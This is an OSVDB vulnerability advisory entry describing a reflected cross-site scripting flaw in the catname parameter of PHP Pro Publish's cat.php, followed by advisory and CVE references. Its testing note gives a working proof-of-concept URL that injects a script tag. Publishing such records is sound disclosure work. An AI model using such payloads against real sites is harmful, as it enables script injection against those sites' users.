PHP Pro Publish cat.php catname Variable XSS

2006-06-02T08:20:22
ID OSVDB:25979
Type osvdb
Reporter OSVDB
Modified 2006-06-02T08:20:22

Description

Manual Testing Notes

http://[target]/propublish/cat.php?catname="><script>alert(/Soot/)</script>

References:

Vendor URL: http://www.deltascripts.com/
Secunia Advisory ID: 20444
Related OSVDB ID: 25978
Other Advisory URL: http://soot.shabgard.org/bugs/propublish.txt
Mail List Post: http://seclists.org/lists/bugtraq/2006/Jun/0037.html
FrSIRT Advisory: ADV-2006-2130
CVE-2006-2876